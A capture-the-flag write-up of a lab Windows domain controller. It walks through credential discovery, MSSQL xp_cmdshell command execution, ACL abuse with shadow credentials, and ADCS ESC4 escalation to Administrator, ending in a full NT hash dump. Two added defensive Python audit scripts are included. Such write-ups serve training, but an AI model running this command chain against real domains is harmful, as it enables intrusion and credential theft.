Basic Information

As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

Port Scan

No web service; 1433 (MSSQL) plus the usual domain-controller ports:

$ nmap -sC -sV -Pn 10.10.11.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-13 13:23 CST
Nmap scan report for 10.10.11.51
Host is up (0.081s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-13 05:09:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m36s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T04:17:33
|_Not valid after: 2055-01-13T04:17:33
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m36s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m37s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m36s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-01-13T05:10:06
|_ start_date: N/A
|_clock-skew: mean: -15m36s, deviation: 0s, median: -15m36s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.98 seconds

Add the discovered hostnames to the hosts file:

10.10.11.51 sequel.htb dc01.sequel.htb

bloodhound

Collect BloodHound data with the provided initial credentials:

bloodhound-python -u rose -p KxEPkKe6R8su -d sequel.htb -ns 10.10.11.51 -c All --zip

BloodHound shows no directly exploitable path from rose.

usernames

These can be compiled from the BloodHound data, or obtained like this:

faketime -f "-15m36s" nxc smb dc01.sequel.htb -u rose -p KxEPkKe6R8su -d sequel.htb --rid-brute 5000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

Administrator
Guest
krbtgt
DC01$
michael
ryan
oscar
sql_svc
rose
ca_svc

SMB

SMB exposes some non-default shares:

python3 examples/smbclient.py rose:'KxEPkKe6R8su'@10.10.11.51

Accounting Department

The Accounting Department share holds two xlsx files. After downloading them, Excel cannot open them, so unzip them directly and read the contents; one of the files yields several account passwords:

unzip accounts.xlsx
cat xl/sharedStrings.xml

angela 0fwz7Q4mSpurIt99
Oscar 86LxLBMgEWaKUnBG
Kevin Md9Wlq1E5bZnVDVo
sa MSSQLP@ssw0rd!
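As an added example (not code from the original writeup), a Python scan that reads the sharedStrings part of a workbook directly, the same way the unzip step above does, and flags credential-looking cells so a defender can sweep a share for workbooks like accounts.xlsx before an attacker does. The sample workbook is constructed inline from the values shown above; the "12+ characters, three character classes" heuristic is an assumption to tune per environment.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of the SpreadsheetML shared-strings part (xl/sharedStrings.xml).
NS = {"s": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# Heuristic (assumption): a secret-looking cell has 12+ non-space characters
# and at least three of the four classes lower/upper/digit/symbol.
TOKEN_RE = re.compile(r"^\S{12,}$")

def looks_like_secret(s: str) -> bool:
    if not TOKEN_RE.match(s):
        return False
    classes = sum(bool(re.search(p, s)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^\w]"))
    return classes >= 3

def shared_strings(xlsx_bytes: bytes) -> list[str]:
    """Return every shared string in the workbook without opening it in Excel."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        if "xl/sharedStrings.xml" not in z.namelist():
            return []
        root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    # Each <si> holds one <t> or several <r><t> rich-text runs; join the runs.
    return ["".join(t.text or "" for t in si.iter(f"{{{NS['s']}}}t"))
            for si in root.findall("s:si", NS)]

def find_secrets(xlsx_bytes: bytes) -> list[str]:
    """Cells worth a closer look; review the surrounding headers before acting."""
    return [s for s in shared_strings(xlsx_bytes) if looks_like_secret(s)]

def build_sample_xlsx() -> bytes:
    """Constructed minimal workbook (only the shared-strings part) for offline testing."""
    xml = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="6" uniqueCount="6">'
           '<si><t>Username</t></si><si><t>Password</t></si>'
           '<si><t>angela</t></si><si><t>0fwz7Q4mSpurIt99</t></si>'
           '<si><r><t>sa</t></r></si><si><t>MSSQLP@ssw0rd!</t></si>'
           '</sst>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/sharedStrings.xml", xml)
    return buf.getvalue()

if __name__ == "__main__":
    for hit in find_secrets(build_sample_xlsx()):
        print("possible credential:", hit)
```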

mssql

Of the passwords recovered above, sa is still valid. Connect to MSSQL, use the usual xp_cmdshell route, and get a shell as sql_svc:

python3 examples/mssqlclient.py sa:'MSSQLP@ssw0rd!'@10.10.11.51

enable_xp_cmdshell
xp_cmdshell whoami
xp_cmdshell powershell -e JABjAGwAa<payload>pAA==

But the required privilege is missing, so the usual Potato escalation to SYSTEM does not work directly. Keep digging through files; a password turns up in a configuration file:

PS C:\SQL2019\ExpressAdv_ENU> type sql-Configuration.INI

WqSZAF6CysDQbGb3

ryan & user flag

Enumeration shows that ryan reuses the sql_svc password:

nxc smb 10.10.11.51 -u users.txt -p WqSZAF6CysDQbGb3 -d sequel.htb --continue-on-success

...
SMB 10.10.11.51 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
...
SMB 10.10.11.51 445 DC01 [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
...

ryan is in the Remote Management Users group, so log in directly over WinRM:

evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3

CA_SVC

ryan has WriteOwner over ca_svc.

So ryan sets himself as the owner of ca_svc, grants himself the permissions, and can then operate on the account freely:

# set owner
bloodyAD --host dc01.sequel.htb -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set owner ca_svc ryan
# modify permissions
python3 examples/dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
# the usual shadow credentials
faketime -f "-15m36s" certipy shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc

[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

ADCS

ca_svc is the ADCS service account; what follows is standard ADCS enumeration, which turns up ESC4:

export KRB5CCNAME=ca_svc.ccache
faketime -f "-15m36s" certipy find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout

ESC4

From here it is step by step:

# update the template
faketime -f "-15m36s" certipy template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51

# request a certificate
faketime -f "-15m36s" certipy req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51

# authenticate with the certificate
faketime -f "-15m36s" certipy auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51

7a8d4e04986afa8ed4060f75e5a0b3ff

root flag

Log in with the recovered hash:

evil-winrm -i 10.10.11.51 -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff

hashdump

python3 examples/secretsdump.py Administrator@10.10.11.51 -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1acb6bdf708cb2e0b6802e77649e55cc:::
sequel.htb\michael:1103:aad3b435b51404eeaad3b435b51404ee:cafe5ec3c162eaf0d46e3013b0d71dba:::
sequel.htb\ryan:1114:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\oscar:1116:aad3b435b51404eeaad3b435b51404ee:97504ea3a7ca31b7d91e26ef82e3e383:::
sequel.htb\sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\rose:1601:aad3b435b51404eeaad3b435b51404ee:0e0b8e0b06c681da8c3f1f17e53a4a56:::
sequel.htb\ca_svc:1607:aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::
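The dump above shows ryan and sql_svc carrying the identical NT hash, which is the password reuse that opened the ryan path earlier. As an added example (not the author's code), a Python audit over secretsdump-style lines that groups accounts by NT hash and reports hashes shared between accounts as well as accounts with the empty-password hash; the sample lines are constructed with made-up hashes and a made-up domain, except the well-known empty-password NT hash.

```python
from collections import defaultdict

# Constructed sample in secretsdump "-just-dc-ntlm" format (account:rid:lm:nt:::).
# Hashes and the domain are invented for the example; only Guest's value is the
# real, well-known NT hash of the empty password.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
corp.local\\ryan:1114:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
corp.local\\sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
corp.local\\rose:1601:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
"""

# NT hash of the empty password; an enabled account carrying it is its own finding.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

def parse_dump(text):
    """Yield (account, rid, nt_hash) per well-formed line, skipping computer accounts."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        account, rid, _lm, nt = parts[:4]
        if account.endswith("$"):   # machine accounts rotate random passwords; not reuse candidates
            continue
        yield account, int(rid), nt.lower()

def shared_hashes(text):
    """Map each NT hash used by more than one account to the sorted accounts sharing it."""
    by_hash = defaultdict(list)
    for account, _rid, nt in parse_dump(text):
        by_hash[nt].append(account)
    return {nt: sorted(accts) for nt, accts in by_hash.items() if len(accts) > 1}

def empty_password_accounts(text):
    return sorted(a for a, _r, nt in parse_dump(text) if nt == EMPTY_NT)

def report(text):
    """Human-readable findings; the hash prefix is enough to correlate, never log the full value."""
    findings = []
    for nt, accts in shared_hashes(text).items():
        findings.append(f"password reuse: {', '.join(accts)} share NT hash {nt[:8]}...")
    for a in empty_password_accounts(text):
        findings.append(f"empty password: {a}")
    return findings

if __name__ == "__main__":
    for line in report(SAMPLE_DUMP):
        print(line)
```

A service account sharing a hash with an interactive user, as here, is the case to prioritise: rotating the service password alone leaves the user's password, and any credential-reuse path through it, untouched.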

References